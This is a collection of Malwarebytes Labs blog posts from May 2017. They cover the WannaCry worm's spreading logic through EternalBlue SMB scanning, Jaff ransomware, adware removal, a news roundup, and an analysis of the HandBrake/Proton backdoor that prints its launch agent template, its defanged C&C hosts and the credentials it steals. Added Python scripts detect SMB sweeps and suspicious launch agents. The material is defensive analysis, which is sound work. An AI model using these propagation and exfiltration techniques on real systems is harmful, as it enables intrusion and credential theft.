Now that we have that out of the way, here’s some handy links for you to get a good overview of what’s been going on:

This is a rapidly changing story, with a lot of valuable follow-up data being posted to haunts favored by security researchers such as Twitter, and we’ll likely add more links as the days pass. Update your security tools, patch your version of Windows and stay safe!


The Malwarebytes Labs Team

The post Wanna Cry some more? Ransomware roundup special edition appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The worm that spreads WanaCrypt0r

Malwarebytes - Fri, 05/12/2017 - 22:02

Something that many security researchers have feared has indeed come true. Threat actors have integrated a critical exploit taking advantage of a popular communication protocol used by Windows systems, crippling thousands of computers worldwide with ransomware.

Within hours of being leveraged, a flaw that had been recently patched by Microsoft has been used to distribute the WanaCrypt0r ransomware and wreak havoc worldwide.

In this blog post, we will describe the worm responsible for spreading this ransomware by looking at its capabilities and what has made this threat so successful.

Main functionality

WanaCrypt0r has been most effective—not only does the ransomware loop through every open RDP session on a system and run the ransomware as that user, but the initial component that gets dropped on systems appears to be a worm that contains and runs the ransomware, spreading itself using the ETERNALBLUE SMB vulnerability (MS17-010).

The WinMain of this executable first tries to connect to the website It doesn’t actually download anything there, just tries to connect. If the connection succeeds, the binary exits.

This was probably some kind of kill switch or anti-sandbox technique. Whichever it is, it has backfired on the authors of the worm, as the domain has been sinkholed and the host in question now resolves to an IP address that hosts a website. Therefore, nothing will happen on any new systems that runs the executable. This only applies to the binary with the hash listed above; there may well be new versions released in the future.

After this check passes, the first thing the worm does is check the number of arguments it was launched with. If it was run with less than two arguments passed, it installs a service called mssecsvc2.0 with display name Microsoft Security Center (2.0) Service (where the binary ran is itself with two arguments), starts that service, drops the ransomware binary located in the resources of the worm, and runs it.

If it was run with two arguments or more—in other words, if it was run as a service—execution eventually falls through to the worm function.

The initialization function is called first; it calls WSAStartup() to initialize networking, then CryptAcquireContext() to initialize the crypto API so the worm can use a cryptographically secure pseudo-random number generator. It then calls a function that initializes two buffers used for storing the worm payload DLLs, one x86 and one x64. It copies the payload DLLs from the .data section of the worm and then copies the entire worm binary after it.

The code of each payload DLL is very small: it just gets the resource content (i.e. the worm binary), drops it to disk as C:\WINDOWS\mssecsvc.exe (this path is actually hardcoded) and executes it.

SMB vulnerability leveraged to spread ransomware worldwide

After initializing the functionality used by the worm, two threads are created. The first thread scans hosts on the LAN. The second thread gets created 128 times and scans hosts on the wider Internet.

The first thread (in charge of scanning LAN) uses GetAdaptersInfo() to get a list of IP ranges on the local network, then creates an array of every IP in those ranges to scan.

The LAN scanning is multithreaded itself, and there is code to prevent scanning more than 10 IP addresses on the LAN at a time.

The scanning thread tries to connect to port 445, and if the connection succeeds it creates a new thread to try to exploit the system using MS17-010/EternalBlue. If the exploitation attempts take over 10 minutes, the exploitation thread is stopped.

The threads that scan the Internet generate a random IP address, using either the OS’s cryptographically secure pseudo-random number generator initialized earlier, or a weaker pseudo-random number generator if the CSPRNG failed to initialize. If a connection to port 445 on that random IP address succeeds, the entire /24 range is scanned, and wherever port 445 is open, exploit attempts are made. This time, the exploitation timeout for each IP is not 10 minutes but one hour.

The exploitation thread tries several times to exploit, with two different sets of buffers used (perhaps one for x86 and one for x64). If it detects the presence of DOUBLEPULSAR after any exploitation attempt, it uses DOUBLEPULSAR to load the relevant payload DLL.
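The scanning behaviour described above (a burst of distinct LAN targets on TCP/445, then a whole external /24 once a random Internet host answers) is visible in outbound flow logs. The following is an added example for this page, not Malwarebytes’ code; the record layout, the local range, the thresholds and the sample flows are all constructed assumptions:

```python
"""Spot outbound SMB (TCP/445) sweeps of the kind described above in flow logs.

Added example for this page, not Malwarebytes' code. Everything here is
constructed: the flow record layout, the site's local range and the
thresholds are assumptions, not any vendor's export format or tuning.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed record layout: "<ISO timestamp> <src ip> <dst ip> <dst port> <action>"
LOCAL_RANGES = [ipaddress.ip_network("10.0.0.0/24")]  # assumed site LAN
WINDOW = timedelta(minutes=10)   # the worm's per-target LAN exploit timeout
LAN_MIN_TARGETS = 10             # the worm works the LAN ten addresses at a time
SLASH24_MIN_TARGETS = 20         # a near-complete sweep of one external /24


def constructed_flows():
    """Build the constructed sample: one scanning host (10.0.0.5) and one
    ordinary workstation (10.0.0.9) that only talks to its file server."""
    base = datetime(2017, 5, 12, 13, 0, 0)
    t, lines = base, []
    for last in range(1, 13):            # LAN sweep: twelve neighbours on 445
        t += timedelta(seconds=1)
        lines.append(f"{t.isoformat()} 10.0.0.5 10.0.0.{last} 445 deny")
    t += timedelta(seconds=1)            # one random Internet host answers...
    lines.append(f"{t.isoformat()} 10.0.0.5 203.0.113.17 445 allow")
    for last in range(1, 26):            # ...so its whole /24 gets probed
        t += timedelta(seconds=1)
        lines.append(f"{t.isoformat()} 10.0.0.5 203.0.113.{last} 445 deny")
    for minute in (0, 5, 9):             # benign: repeated access to one share
        ts = base + timedelta(minutes=minute)
        lines.append(f"{ts.isoformat()} 10.0.0.9 10.0.0.1 445 allow")
    return "\n".join(lines)


def parse_flows(text):
    """Yield (timestamp, src, dst, dport) for each non-empty record."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, _action = line.split()
        yield (datetime.fromisoformat(ts), ipaddress.ip_address(src),
               ipaddress.ip_address(dst), int(port))


def smb_sweeps(text, local_ranges=LOCAL_RANGES, window=WINDOW):
    """Return {source: finding} for sources whose distinct 445 targets inside
    any single window look like a LAN sweep and/or an external /24 sweep."""
    per_src = defaultdict(list)
    for ts, src, dst, port in parse_flows(text):
        if port == 445:
            per_src[src].append((ts, dst))
    findings = {}
    for src, events in per_src.items():
        events.sort(key=lambda e: e[0])
        best, j = set(), 0
        for i, (start, _) in enumerate(events):
            while j < len(events) and events[j][0] - start <= window:
                j += 1                   # j: first event outside this window
            targets = {dst for _, dst in events[i:j]}
            if len(targets) > len(best):
                best = targets           # keep the busiest window per source
        lan = {d for d in best if any(d in net for net in local_ranges)}
        external = defaultdict(set)
        for d in best - lan:
            external[str(ipaddress.ip_network(f"{d}/24", strict=False))].add(d)
        verdicts = []
        if len(lan) >= LAN_MIN_TARGETS:
            verdicts.append("lan-sweep")
        verdicts += [f"slash24-sweep:{net}" for net, hosts in external.items()
                     if len(hosts) >= SLASH24_MIN_TARGETS]
        if verdicts:
            findings[str(src)] = {"lan_targets": len(lan),
                                  "external": {n: len(h) for n, h in external.items()},
                                  "verdicts": verdicts}
    return findings


if __name__ == "__main__":
    for src, finding in smb_sweeps(constructed_flows()).items():
        print(src, finding)
```

On the constructed sample only 10.0.0.5 is reported, with both a LAN sweep and a sweep of 203.0.113.0/24; the workstation that repeatedly reaches one file server is not.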


It is critical that you install all available OS updates to prevent getting exploited by the MS17-010 vulnerability. Any systems running a Windows version that did not receive a patch for this vulnerability should be removed from all networks. If your systems have been affected, DOUBLEPULSAR will also have been installed, so it will need to be removed as well. A script is available that can remotely detect and remove the DOUBLEPULSAR backdoor. Consumer and business customers of Malwarebytes are protected from this ransomware by the premium version of Malwarebytes and Malwarebytes Endpoint Security, respectively.

The post The worm that spreads WanaCrypt0r appeared first on Malwarebytes Labs.

Categories: Techie Feeds

WanaCrypt0r ransomware hits it big just before the weekend

Malwarebytes - Fri, 05/12/2017 - 18:07

Reports of two massive, global ransomware attacks are dominating the news. As workers in Europe are heading home for the weekend, ransomware is shutting down their systems. Here’s what we know so far.

Big targets

National Health Service (NHS) England and Telefonica, one of the largest telecom providers in the world, have each given out statements indicating that their systems have been brought to a grinding halt by a ransomware that Malwarebytes detects as Ransom.WanaCrypt0r. The ransomware has also been observed hitting companies in Spain, Russia, Ukraine, and Taiwan.


The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked set of NSA exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet.

The demanded ransom of $300 and the potential risks to the public that come with the targets being big utility and healthcare companies seem to be in stark contrast. We can only hope that the companies that were hit will be able to get their backups deployed quickly and can start the recovery from this cyberattack.


Consumers and businesses alike should be sure their systems and software are updated with all current patches in order to stop the spread of infection. Both our consumer product, Malwarebytes, and our business product, Malwarebytes Endpoint Security, protect against this threat, since we detect this ransomware. And our anti-ransomware technology will stop any future unknown variants.

More to come

We’ll continue to update this post as news develops. We’ll provide additional technical analysis throughout the day.

The post WanaCrypt0r ransomware hits it big just before the weekend appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New ‘Jaff’ ransomware via Necurs asks for 2 BTC

Malwarebytes - Thu, 05/11/2017 - 17:11

There is yet another ransomware on the block, but contrary to the many copycats out there this one appears to be more serious and widespread since it is part of the Necurs spam campaigns.

Originally identified by security researcher S!Ri, the Jaff ransomware looks very similar to Locky in many ways: same distribution via the Necurs botnet, same PDF that opens up a Word document with a macro, and a similar payment page.

However, this is where the comparison ends, since the code base is different as well as the ransom itself. Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing.

Malwarebytes users are already protected against this ransomware thanks to our multi-layer defense. In the diagram below we show how the threat can be blocked via each of our protection modules (in a typical scenario, the threat would be stopped at the first layer which is the Application Behavior Protection):

In the meantime, the return of Locky after a short hiatus has not been as big as anticipated. The appearance of the Jaff ransomware may also take away some market share from it.

The post New ‘Jaff’ ransomware via Necurs asks for 2 BTC appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 3

Malwarebytes - Wed, 05/10/2017 - 15:00

In this series of posts, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Getting rid of files

In this post, we will discuss several methods to remove the files responsible for showing you the offending advertisements in those cases where the identified process is not a browser.


With many PUPs and sometimes even more intrusive adware, uninstalling the program that is showing you the advertisements will be enough. If this works it’s often the cleanest and easiest method to get rid of the advertisements. Identifying which program to uninstall from your list of installed software and features is sometimes the hardest step in this process. Here are a few tips that might help you to do so:

  • Use your favorite search engine to look for the process name we found to be responsible for the advertisement window. Sometimes this will reveal the name of the software it belongs to and how it’s listed in your list of installed programs and features.
  • Sort the list of installed programs and features by date of install. Although this date can easily be spoofed, most software packages in this category won’t. Compare that date to the date when the advertisements first started appearing.
    • Warning: in cases where you used a bundler there might be several entries with the same date.
  • Use your favorite search engine to look for the entries in your list of installed programs and features that you don’t recognize or remember installing.

Once you have identified the entries you want to remove, select them by clicking on the line in the list, and click on Uninstall.

It may be necessary to reboot the system for the changes to take effect. If this solves the problem, great. If not, keep reading.

Delete the file

If the advertisements don’t stop after trying the user-friendly approach outlined earlier, your next step is to delete the file which is responsible for the advertisements. This is a much less clean solution, as it might leave more clutter behind. There are several methods that can be used and I will try to list them in order of stubbornness. But first, we need to find the file. Since we already used Process Explorer to identify the process, we will also use it to locate the file. Right-click on the selected process, choose Properties and look at the Image tab to see the full path to the file.

Make a note of the path as we will need that later on. Then close the properties window and right-click the selected process once more. This time use the Kill Process Tree option and confirm that you want to kill this process (and if applicable the ones under it). If the process respawns immediately or Process Explorer (running elevated) is unable to kill it, you will have to wait for other parts in this series. If the process dies you can proceed with the deletion methods below.

  • Easy: navigate to the file path you made a note of earlier, right-click the file and choose Delete.
  • If that doesn’t work, there is always FileASSASSIN, but you will have to be 100% sure about the file you are going to remove.
    • Download and install FileASSASSIN following the prompts.
    • Browse to the file you want to delete, check all the upper boxes as shown below and click Execute.
    • You will see a prompt telling you whether the deletion was successful or not.
    • If this method does not work, give the Use delete on Windows reboot functions of FileASSASSIN a try.
  • The last method we will discuss here involves rebooting your computer in Safe Mode with Command Prompt. Doing so will cause Windows to only run the bare necessities and lessen the chance of the user being unable to delete the file. In the Command Prompt use this command structure: DEL /F /S /Q /A "{full path to the file, including the extension}"
  • Sometimes deleting such a file can cause errors which can be avoided by replacing the file with another (legitimate) one. Again, boot into Safe Mode with Command Prompt and use this command structure: COPY /V /Y "{full path to the legitimate file, including the extension}" "{location of the file to be replaced}"

Note that the last part just is the destination folder, there is no need to specify the filename and extension again.

If all of the above do not work for you, you may have to wait for the post that deals with rootkits. See you later. And stay safe out there.

Index

Part 1
  • Identify the process
  • Clear browser caches
  • Remove browser extensions

Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers

Part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file

Up next, part 4
  • Scheduled tasks
  • Services



Pieter Arntz

The post Adware the series, part 3 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 01 – May 07)

Malwarebytes - Mon, 05/08/2017 - 18:00

Last week, we reported on that fake Google Docs app in real time as it wreaked havoc among Gmail users worldwide. We also pushed out part 2 of our series on adware. During World Password Day, we highlighted the fact that although using multiple passwords is good, this may be difficult if one cannot manage them efficiently.

As it’s spring in the Northern Hemisphere, we found it appropriate and timely to write up a spring cleaning post.

Lastly, we covered a fair amount of macOS malware, specifically OSX.Dok and Snake. Click those links to check out technical details for each.

OWASP top ten – Boring security that pays off

Below are notable news stories and security-related happenings:

  • Super Free Music Player Is The Latest Malware On Google Play. “Another day, another piece of malware lurking on Google Play, masquerading as a free and helpful app. This time it’s called ‘Super Free Music Player’ and is supposedly a ‘great song app for discovering and listening to trending music’, and contains ‘unlimited free songs from Soundcloud.'” (Source: Help Net Security)
  • Schools Among The Most Sought After Cyber Targets: ESET Report. “What makes these organizations such an inviting target is schools, both those of higher education and local school districts, hold in one place all the types of data prized by hackers, health care information, student and employee personally identifiable information (PII), research and even payment card data, according to a report by ESET researcher Lisa Myers.” (Source: SC Magazine)
  • UK Office Workers ‘Too Trusting’ Of Email Attachments. “More than half (58%) of office workers among 1000 employees surveyed at mid-to-large UK businesses admitted to often opening email attachments from unknown senders, leaving companies open to breaches from documents carrying malicious exploits hidden inside common file-types.” (Source: InfoSecurity Magazine)
  • Criminals Turning To Fraudulent Gift Cards. “Traditionally, gift cards have been a quick way to make stolen credit card numbers pay off quickly. They buy the gift cards online, in bulk, then use the gift cards at their leisure or resell them, without worrying that the credit card number has been canceled — until the charge backs started coming in from the credit card companies and merchants wised up.” (Source: CSO)
  • HideMyAss! Privilege Escalation Flaws Exposed. “A set of serious security flaws in the HideMyAss! proxy service which could place user security and privacy at risk have been publicly disclosed. Over the weekend, Security researcher Han Sahin said that multiple privilege escalation vulnerabilities exist in HideMyAss! Pro VPN for Apple’s OS X operating system, a subscription-based virtual private network (VPN) service used to mask user traffic and online activities.” (Source: ZDNet)
  • 7 Steps To Fight Ransomware. “As ransomware perpetrators continue to hone their skills, we’re seeing a shift to more specific targets. The driver of this shift is the realization that companies, especially larger ones, are much higher-value targets than an average individual and are thus able to pay significantly higher ransoms. This change has elevated the need for companies to strengthen their defensive strategies. Executives must allocate resources and ensure strategies are active against ransomware intent on paralyzing their organization.” (Source: Dark Reading)
  • Fraudsters Draining Accounts With ‘SIM Swaps’ – What To Do. “A new phone can take over your old number because the number is actually tied to your SIM card – in fact, SIM is short for subscriber identity module, a special system-on-a-chip card that securely stores the cryptographic secret that identifies your phone number to the network. You may also need to get a new SIM from your mobile provider if you switch to a phone that requires a differently sized SIM card to the one in your current device.” (Source: Sophos’s Naked Security Blog)
  • Thieves Drain 2fa-protected Bank Accounts By Abusing SS7 Routing Protocol. “The unidentified attackers exploited weaknesses in Signalling System No. 7, a telephony signaling language that more than 800 telecommunications companies around the world use to ensure their networks interoperate. SS7, as the protocol is known, makes it possible for a person in one country to send text messages to someone in another country. It also allows phone calls to go uninterrupted when the caller is traveling on a train.” (Source: Ars Technica)
  • iPhone Phishing Scam Crosses Over Physical Crime. “Last late April a friend of mine had his iPhone stolen in the streets—an unfortunately familiar occurrence in big, metropolitan areas in countries like Brazil. He managed to buy a new one but kept the same number for convenience. Nothing appeared to be out of the ordinary at first—until he realized the thief changed his Facebook password.” (Source: TrendLabs’s Security Intelligence Blog)
  • NYPD: Fraud Ring Recruited Mules Via Social Media. “New York City police are claiming victory after smashing a multi-million-dollar financial fraud ring which is alleged to have recruited participants via enticing social media ads. The authorities have indicted 39 people for their part in a sophisticated operation which resulted in a whopping $2.5m in fraud.” (Source: InfoSecurity Magazine)
  • Europe Pumps Out 50% More Cybercrime Attacks Than US. “Cybercrime attacks launched from Europe reached more than 50 million in the first quarter, double the volume coming out of the US, according to the ThreatMetrix Q1 Cybercrime Report released today. And within Europe, Italy, France, Germany, and the UK accounted for half of all attacks originating out of the region, with the UK and Germany contributing the lion’s share.” (Source: Dark Reading)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (May 01 – May 07) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

HandBrake hacked to drop new variant of Proton malware

Malwarebytes - Mon, 05/08/2017 - 17:04

Last year, the Transmission torrent app was hacked not just once, but twice, to install the KeRanger ransomware and, later, the Keydnap backdoor. Now, the same thing has happened to the popular DVD-ripping HandBrake app, which is installing a new variant of the Proton malware.

The real HandBrake 1.0.7 app was replaced with a malicious copy on May 2. The issue was discovered and the malicious app was removed on May 6, and a security warning was posted on the HandBrake website. Both the HandBrake website and the copy of HandBrake available via Homebrew (a command-line software installation system) were affected.

Am I infected?

The security warning provides SHA1 and SHA256 hashes for the malicious HandBrake-1.0.7.dmg file, recommending that you check this against the hash of your download before installing. To do this, enter the following command in the Terminal app (found in the Utilities folder in the Applications folder):

shasum /path/to/HandBrake-1.0.7.dmg

(Of course, be sure to insert the proper path to the .dmg file. Note that you can drag a file onto the Terminal window to insert its path into the command automatically.)

Compare the value returned by this command to the SHA1 hash. If it’s a match, throw that .dmg file in the trash, delete your copy of HandBrake, and scan your Mac with Malwarebytes for Mac. We detect this malware as OSX.Proton.

At this point, you can – in theory – safely download a new copy of HandBrake. I say “in theory” because we don’t know yet how the HandBrake site was hacked and what mitigations have been put in place to prevent future hacks.

If you download a new copy of HandBrake, you can check it against the checksums listed on the HandBrake site to verify that it is valid. However, there’s a big problem with this: If the website has been hacked to replace the legit copy of the software with a bad one, it’s reasonable to assume that the checksums there could be replaced with bad ones as well.

Unfortunately, HandBrake is not code signed, so there’s no real way to verify with 100% certainty that the copy you have has not been tampered with.

Malicious behavior

The malicious copy of HandBrake, when run, will immediately ask for an admin password.

This is not normal for HandBrake, which may tip off a veteran user of the software. However, for a new user, or someone installing an update who isn’t yet familiar with the behavior of that update, this may not raise any red flags.

If you are suspicious and click the Cancel button, it seems that the malware is not installed. Further, in my testing, there were no additional prompts in opening the app after the first. Still, I wouldn’t trust that copy of the app at all, even if it doesn’t appear to be dropping the payload under those conditions.

Unfortunately, checking for updates in the malicious copy does not result in any kind of a warning. When the same thing happened to the Transmission app, the Transmission Project quickly put out an update that would replace the infected app with a clean one, as well as cleaning up any traces of the infection on the system. Hopefully, the same will happen for HandBrake, but at the time of this writing that has not been done yet.

If the password is given, the malicious app will install the malware on the system in the following locations:

~/Library/LaunchAgents/fr.handbrake.activity_agent.plist
~/Library/RenderFiles/

The launch agent runs the activity_agent app at login and keeps it running in the event something terminates it.

However, it seems that this malware may be a bit buggy. On the first install, it also dropped a non-functional launch agent named fr.handbrake.activity_agent.plist-e with some of the contents missing. In another install, the launch agent contained the following non-functional plist data:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
    <key>KeepAlive</key>
    <true/>
    <key>Label</key>
    <string>P_MBN</string>
    <key>ProgramArguments</key>
    <array>
        <string>P_UPTH</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

It appears that the malware installs this .plist template, then uses the Unix sed command to search for and replace the P_MBN and P_UPTH values, but fails to do so in some cases. Thus, the malware does not always successfully install.
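A defender triaging ~/Library/LaunchAgents can look for exactly the traits described above: the unsubstituted P_MBN/P_UPTH placeholders, the reported label, a KeepAlive agent whose program lives inside the user’s Library folder, and the stray .plist-e file. This is an added example, not Malwarebytes’ or HandBrake’s code; the sample plists are constructed and the activity_agent file path is an assumption (the real file name is not given on the page):

```python
"""Triage macOS launch agent plists for the traits of the Proton launch agent
described above. Added example for this page, not Malwarebytes' code; the
sample plists are constructed and the executable path in the "completed"
sample is an assumption.
"""
import plistlib
import re

PLACEHOLDERS = ("P_MBN", "P_UPTH")                 # template tokens a failed sed pass leaves behind
SUSPECT_LABELS = {"fr.handbrake.activity_agent"}  # label reported for this variant
# A program started from the user's own Library folder is user-writable and
# outside the usual locations for legitimate launch agents.
USER_LIBRARY = re.compile(r"(~|/Users/[^/]+)/Library/")


def _plist(label, program):
    """Build a constructed KeepAlive + RunAtLoad launch agent plist."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>KeepAlive</key><true/>
    <key>Label</key><string>{label}</string>
    <key>ProgramArguments</key><array><string>{program}</string></array>
    <key>RunAtLoad</key><true/>
</dict>
</plist>
""".encode()


# Constructed samples: the unfilled template from the page, a filled-in agent
# (path assumed), and an ordinary agent that should not be flagged.
TEMPLATE_PLIST = _plist("P_MBN", "P_UPTH")
COMPLETED_PLIST = _plist("fr.handbrake.activity_agent",
                         "/Users/victim/Library/RenderFiles/activity_agent")
BENIGN_PLIST = _plist("com.example.backup",
                      "/Applications/Backup.app/Contents/MacOS/backup")


def triage_launch_agent(data):
    """Return the list of reasons a launch agent plist deserves a closer look."""
    plist = plistlib.loads(data)
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    program = args[0] if args else ""
    reasons = []
    if label in SUSPECT_LABELS:
        reasons.append("known-proton-label")
    if any(tok in label or any(tok in a for a in args) for tok in PLACEHOLDERS):
        reasons.append("unsubstituted-template")
    if USER_LIBRARY.match(program) and plist.get("KeepAlive") and plist.get("RunAtLoad"):
        reasons.append("keepalive-binary-in-user-library")
    return reasons


def stray_launch_agent_files(names):
    """Flag files in a LaunchAgents folder that launchd will not load at all,
    such as the '.plist-e' file the page describes (BSD sed writes a backup
    with that suffix when 'sed -i -e' is used)."""
    return [n for n in names if not n.endswith(".plist")]


if __name__ == "__main__":
    for name, sample in (("template", TEMPLATE_PLIST), ("completed", COMPLETED_PLIST),
                         ("benign", BENIGN_PLIST)):
        print(name, triage_launch_agent(sample))
    print(stray_launch_agent_files(["fr.handbrake.activity_agent.plist-e",
                                    "com.apple.example.plist"]))
```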

The fact that the malware requests an admin password yet installs all components in user space where no admin password is needed was initially puzzling, but that password request is actually not a system-generated prompt. It’s a phishing dialog displayed by the malware to obtain your password, which will be sent in clear text to api[DOT]handbrake[DOT]biz, the command & control (C&C) server for this malware.

The malware will create some or all of the following files:

~/Library/VideoFrameworks/

These files contain a number of bits of data to be exfiltrated from the machine, such as browser data (including stored form auto-fill data), keychains, and even 1Password vaults. Since the user’s password was phished previously, that can be used to unlock the keychains, and either it or other passwords found in the keychain may be able to unlock other encrypted files. (Pro tip: never store the master password for your password manager in the keychain and make sure it’s a unique, strong password!)

The file is a master archive containing everything in the VideoFrameworks folder. It, too, will be sent to the C&C server, handbrake[DOT]biz, a domain that was just registered on April 29 of this year, presumably in preparation for this attack.

Interestingly, the only two Mac apps ever to be hacked in this manner—Transmission, and now HandBrake—were both originally developed by Eric Petit. Though I don’t know if it means anything at all, it’s certainly a fair question to wonder who has access to both of these projects that could be abused in this manner.

What is Proton?

Many people may never have heard of Proton before. Earlier this year, a signature for Proton was silently added to Apple’s XProtect signatures, but nobody ever saw a copy. Later, Sixgill wrote up findings that revealed Proton was malware up for sale on the dark web.

Proton is a professionally-developed backdoor, which at the time was selling for around 40 BTC (bitcoins), an amount that is currently worth more than $63,000. At that price, unlimited installations were allowed. A single-use license cost around 2 BTC, or more than $3,000.

As an aside, I find it rather ironic that this variant of Proton appears to be a bit buggy, with some installs failing. Hopefully, Proton, Inc’s customers will have similar questions. A little discord among criminals wouldn’t be a bad thing.


This is a general-purpose backdoor with all the usual backdoor functionality. In addition, it appears this malware is exfiltrating the entire keychain, with all passwords. Thus, if you’re infected, the first priority should be changing all your online passwords. (After ensuring that your computer is free of infection, of course! Never change passwords on a device that may still be infected.)

You’ll also want to take any necessary precautions if you have sensitive data that may have been exfiltrated and business users should contact their IT departments if a company Mac is found to be infected.

Seems like this is increasingly becoming something Mac users have to worry about.


Thanks to Amit Serper for analysis that provided some clarifying details about the behavior.

The post HandBrake hacked to drop new variant of Proton malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds
